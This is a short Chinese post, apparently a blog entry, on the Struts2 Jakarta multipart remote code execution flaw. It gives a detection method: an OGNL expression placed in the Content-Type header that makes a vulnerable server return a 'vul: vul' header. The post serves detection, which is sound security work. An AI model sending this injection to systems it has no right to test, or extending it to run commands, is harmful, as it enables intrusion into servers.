基于 Jakarta plugin插件的Struts远程代码执行漏洞,恶意用户可在上传文件时通过修改 HTTP请求头中的 Content-Type 值来触发该 漏洞,进而执行系统命令。
无害化检测方法(该检测方法由安恒公司提供):
在向服务器发出的http请求报文中,修改Content-Type字段:
```
Content-Type:%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('vul','vul')}.multipart/form-data
```
如返回response报文中存在vul:vul字段项则表明存在漏洞。
全部评论 (6)